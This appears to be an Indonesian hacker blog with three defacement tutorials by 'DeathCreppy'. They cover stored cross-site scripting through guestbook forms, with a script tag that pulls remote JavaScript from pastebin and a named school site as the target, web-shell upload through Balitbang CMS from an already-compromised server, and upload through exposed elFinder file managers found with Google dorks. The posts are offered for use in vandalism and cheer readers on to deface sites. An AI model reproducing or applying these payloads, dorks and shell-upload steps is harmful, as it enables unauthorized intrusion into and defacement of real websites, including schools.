Jumat, 19 Mei 2017

Deface Website Dengan BukuTamu Vulnerability

Bahan Coly  :


  1. Dork : "Inurl:/Bukutamu.html site:.th"
  2. Script JSO Nih <script type="text/javascript" src="http://pastebin.com/raw/BggTaS0h"></script> " Tinggal Edit
  3. Bawa Enjoy Biar Otak FRESH :D

Step by Step :

  1. Dork : "Inurl:/Bukutamu.html" ,Target : http://www.smpn1batuputih.sch.id/bukutamu.html
  2. Isi Kolom :Name = Isi bebas ,Email = Isi bebas ,Pesan Anda = Masukkan Script JSO : <script type="text/javascript" src="http://pastebin.com/raw/BggTaS0h"></script>

Masukkan Kode Vertifikasi
Klo vuln akan muncul script kalian tadi
Contoh Seperti Dibawah ini :

Tapi klo tidak vuln.. tidak terjadi apa-apa :D
Klo sudah tinggal upload mirror saja :v           

                                                 Kurang Jelas Check Video Sadjah :v





Senin, 06 Maret 2017

Deface Dengan Fake Root CMS Balitbang 3.5.3

Hello All , Kali Ini Saya DeathCreppy Akan Menshare Ilmu Sedikit Buat Agan" :v :P Maklum Masih Newbie
Tanpa Basa Basi Lanjut Aja yahh :v nnti basi ngga bsa di panaskan lagi :D

[+] Siapkan Site Shell (Acess Shell) Deface'an Kalian ;)
[+] CMS Balitbang :v ~> http://pastebin.com/2eaEjp0F
[+] Biarkan Ngga Suntuk Dengerin DJ aja Gan :v https://soundcloud.com/ex-733747936 (Sklian Promot ) :v hihihi
[+] Shell Type .phtml + .php5

1. Masuk Ke Access Shell Web Kalian Yang Sudah Di Deface :)


 2. Pergi [ Fake Root ] Lihat Ada Ngga Dir Website Di Dalamnya :) Kalau Ada Akan Seperti ini :

3. Kita Pergi ke CMS Balitbangnya :v .. Nahh Kalau Disini Minimal Punya Sendiri CMS Balitbangnya Yang Online :v .. Maklum Ane Newbie Ngga Bisa buatnya :D


4. Jika Sudah Ambil Website Yang ada Di [ Fake Root ] Masukkan Ke CMS Balitbang Onlinenya :v
5. Lalu Masukkan Website Yang Ada Di Dalam [ Fake Root ] Trus Isi Datanya :) .. Ikutin Langkah"nya Untuk Lebih Jelasnya ;) Liat Gambar :v


6. Jika Sudah Nanti Akan di Bawa Ke Halaman Selanjutkan Untuk Masukkin Shell Kalian Ke Website Tersebut :) ....Agan "Klik disini untuk bikin SESSION" jika yes brarti bsa and NO you knowlah :v :P truss pilihh "Browser" Pilih File Shell kalian :)  ane pkek .phtml


7. Nahh Jika Sudahhh nnti akan Nampil Seperti ini ;) tinggal masuk ke bagian yang .phtml ssuai yang kita upload file ;) :v
8. Nahh Kalau Sudahh Akan Tampil Seperti ini :v hihihi Tinggal cari index.php nya Kalau Mau ;p ;p Atau Nitip File Saja ;)

9. Dan Hasilnya :v Doraaaa.. Doraaa :D ;p ;p . Keep Claimz Crotz


Gimana ? Cukup Mudahkan ? :D pasti bisalah Di praktekkan :D
Keep Solidaritas gan :) and Jangan Lupa di Share Yahh ;) .. Comment Jika Berguna :D
Salam Hangat Jones Unlimited EditionBoleh Nitip Nick Yah Di Scritpnya :) : DeathCreppy Thank's Sebelumnya :)




Jumat, 23 September 2016

Cara Deface Website Dengan elFinder

Assalamu'alaikum..
Kembali Lagi Bersama Saya >< DeathCreppy Kali ini saya akan share Methode Cara Deface Dengan elFinder
bagi agan yang lagi nyari tutor elFinder, langsung  disimak aja heheheh
++++++++++++++++++++++++++++++++++++++++++++++
[!]DeathCreppy[!]
DORK:

inurl:/elfinder/elfinder.php.html
inurl:/elfinder/files/
inurl:/elfinder/src/elfinder-src.php.html
++++++++++++++++++++++++++++++++++++++++++++++
Exploit
#########################################
  •  http://site.com/[path]/elfinder/elfinder.html 
  •  http://site.com/[path]/elfinder/elfinder.php.html                  
  •  http://site.com/[path]/elfinder/src/elfinder-src.php.html 
#########################################
ok, langsung aja .Dorking digugel :v
langsung masukin exploit aja.. dicoba satu-satu exploitnya


ok. pada web ini ternyata elFindernya terletak disini..
tuh tinggal upload script agan aja heheheh :D
Cara melihat scriptnya gan ??

Upload Script Agan ><
klik kanan di file yg telah di upload,
lalu klik get info/klik yang paling bawah

















biasanya tampilannya kyk gitu.. ada /git/ nya.. Kalo udh di klik yang /git/ itu, dan hasilnya not found.. Maka langsung aja ke sitenya.. yaitu http://ngecrot.co.li/[path]/elfinder/files/script.html
cara tebas indexnya gmana gan ??
hahah pasti  dah pada bisa lah :D 
Nih dia life demonya:


Semoga Bermanfaat Yahh Gan >< Keep Solidarity Jones Unlimited Edition

Nitip Nick Yahh Kalau Deface Website >< DeathCreppy
All Right Reserved • 2013 Dark Blue Elucidator V3 • Design By : Dimas Galang Ramadhan